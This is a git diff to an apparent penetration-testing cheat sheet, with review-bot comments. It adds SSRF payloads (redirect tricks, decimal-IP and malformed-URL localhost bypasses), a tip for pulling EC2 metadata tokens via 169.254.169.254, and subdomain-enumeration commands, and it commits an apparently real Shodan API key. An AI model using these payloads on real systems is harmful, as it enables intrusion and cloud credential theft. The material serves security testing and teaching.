diff --git a/AWS Amazon Bucket S3/README.md b/AWS Amazon Bucket S3/README.md index 36fcd210..ae26e508 100644 --- a/AWS Amazon Bucket S3/README.md +++ b/AWS Amazon Bucket S3/README.md @@ -48,3 +48,7 @@ List of the top Alexa 100,000 sites with permutations on the TLD and www. For ex * https://community.rapid7.com/community/infosec/blog/2013/03/27/1951-open-s3-buckets * https://digi.ninja/projects/bucket_finder.php * [Bug Bounty Survey - AWS Basic test](https://twitter.com/bugbsurveys/status/859389553211297792) + + + +This is one of my favorite tricks. More and more companies host part of their infrastructure on Amazon EC2. Amazon exposes an internal service every EC2 instance can query for instance metadata about the host. Here’s the AWS documentation. If you found an SSRF vulnerability that runs on EC2, try requesting http://169.254.169.254/latest/meta-data/. This will return a lot of useful information for you to understand the infrastructure and may reveal Amazon S3 access tokens, API tokens, and more. You may also want to download http://169.254.169.254/latest/user-data/ and unzip the data. diff --git a/Methodology_and_enumeration.md b/Methodology_and_enumeration.md index 9d553c8a..471f459f 100644 --- a/Methodology_and_enumeration.md +++ b/Methodology_and_enumeration.md 
@@ -44,6 +44,42 @@ git clone https://github.com/ChrisTruncer/EyeWitness.git ./EyeWitness -f rdp.txt --rdp ``` +* Using Sublist3r +```bash +To enumerate subdomains of specific domain and show the results in realtime: +python sublist3r.py -v -d example.com + +To enumerate subdomains and enable the bruteforce module: +python sublist3r.py -b -d example.com + +To enumerate subdomains and use specific engines such Google, Yahoo and Virustotal engines +python sublist3r.py -e google,yahoo,virustotal -d example.com + +python sublist3r.py -b -d example.com +``` + +* Using Aquatone +``` +gem install aquatone + +Discover subdomains : results in ~/aquatone/example.com/hosts.txt +aquatone-discover --domain example.com +aquatone-discover --domain example.com --threads 25 +aquatone-discover --domain example.com --sleep 5 --jitter 30 +aquatone-discover --set-key shodan o1hyw8pv59vSVjrZU3Qaz6ZQqgM91ihQ + +Active scans : results in ~/aquatone/example.com/urls.txt +aquatone-scan --domain example.com +aquatone-scan --domain example.com --ports 80,443,3000,8080 +aquatone-scan --domain example.com --ports large +aquatone-scan --domain example.com --threads 25 + +Final results +aquatone-gather --domain example.com +``` + + + ## Passive recon * Using Shodan (https://www.shodan.io/) to detect similar app @@ -186,20 +222,6 @@ More subdomain : gobuster -w wordlist -u URL -r -e ``` -* Using Sublist3r -```bash -To enumerate subdomains of specific domain and show the results in realtime: -python sublist3r.py -v -d example.com - -To enumerate subdomains and enable the bruteforce module: -python sublist3r.py -b -d example.com - -To enumerate subdomains and use specific engines such Google, Yahoo and Virustotal engines -python sublist3r.py -e google,yahoo,virustotal -d example.com - -python sublist3r.py -b -d example.com -``` - * Using a script to detect all phpinfo.php files in a range of IPs (CIDR can be found with a whois) ```bash #!/bin/bash 
diff --git a/SSRF injection/README.md b/SSRF injection/README.md index 843432ca..53a6fec4 100644 --- a/SSRF injection/README.md +++ b/SSRF injection/README.md @@ -1,5 +1,5 @@ -# Server-Side Request Forgery -Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on behalf of him. +# Server-Side Request Forgery +Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on behalf of him. ## Exploit @@ -17,6 +17,21 @@ http://localhost:443 http://localhost:22 ``` +Advanced exploit using a redirection +``` +1. Create a subdomain pointing to 192.168.0.1 with DNS A record e.g:ssrf.example.com +2. Launch the SSRF: vulnerable.com/index.php?url=http://YOUR_SERVER_IP +vulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1 +``` + +Advanced exploit using type=url +``` +Change "type=file" to "type=url" +Paste URL in text field and hit enter +Using this vulnerability users can upload images from any image URL = trigger an SSRF +``` + +## Bypassing Bypass localhost with [::] ``` http://[::]:80/ @@ -30,9 +45,18 @@ Bypass localhost with a domain redirecting to locahost http://n-pn.info ``` --> 11211 +Bypass using a decimal ip location +``` +http://2130706433/ = http://127.0.0.1 +http://3232235521/ = http://192.168.0.1 +http://3232235777/ = http://192.168.1.1 +``` + +Bypass using malformed urls +``` localhost:+11211aaa localhost:00011211aaaa +``` ## Thanks to -* \ No newline at end of file +* [Hackerone - How To: Server-Side Request Forgery (SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF)
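Review bot: In the `AWS Amazon Bucket S3/README.md` hunk, the appended EC2 metadata paragraph sits below the reference list with no heading, three leading blank lines, and a dangling "Here's the AWS documentation." whose link was lost in the paste. Give it its own heading (or move it to the SSRF README, where this same patch adds the HackerOne SSRF article under "Thanks to", which the first-person "one of my favorite tricks" wording appears to be quoted from), restore the documentation URL, and attribute the quoted text.

Review bot: In the first `Methodology_and_enumeration.md` hunk (@@ -44,6 +44,42 @@), the Aquatone block commits a real-looking Shodan API key on the `aquatone-discover --set-key shodan ...` line; replace it with a placeholder such as `<SHODAN_API_KEY>` before merging, and rotate the key if it is live. In the same hunk the Sublist3r block is fenced as `bash` but its explanatory lines ("To enumerate subdomains ...") are plain prose that will fail when pasted into a shell, so prefix them with `#`; the final `python sublist3r.py -b -d example.com` duplicates the bruteforce command above it and can be dropped; and the Aquatone fence should carry the same `bash` tag for consistency.

Review bot: In the first `SSRF injection/README.md` hunk (@@ -1,5 +1,5 @@), both replaced lines read identically to the originals, so this is a whitespace-only or BOM change; either confirm it is intentional or drop it, and while touching the line consider "on the attacker's behalf" in place of "on behalf of him".

Review bot: In the second `SSRF injection/README.md` hunk (@@ -17,6 +17,21 @@), the redirection example mixes two different techniques: step 1 creates a DNS A record for `ssrf.example.com` pointing at 192.168.0.1, but step 2 and the explanation use `YOUR_SERVER_IP` that "will redirect", and the subdomain from step 1 is never used. Either make step 2 fetch `http://ssrf.example.com` (DNS-based) or drop step 1 and describe the HTTP redirect from the attacker-controlled host, not both.

Review bot: In the third `SSRF injection/README.md` hunk (@@ -30,9 +45,18 @@), the new "Bypass using a decimal ip location" subsection is inserted between the `--> 11211` context line and the `localhost:+11211aaa` / `localhost:00011211aaaa` lines it annotated, leaving `--> 11211` orphaned under the previous example. Move the decimal block after the malformed-URL block (or move `--> 11211` into the new malformed-URL fence). The decimal conversions themselves are correct (2130706433 = 127.0.0.1, 3232235521 = 192.168.0.1, 3232235777 = 192.168.1.1), and the "Thanks to" fix properly restores the missing reference and the trailing newline.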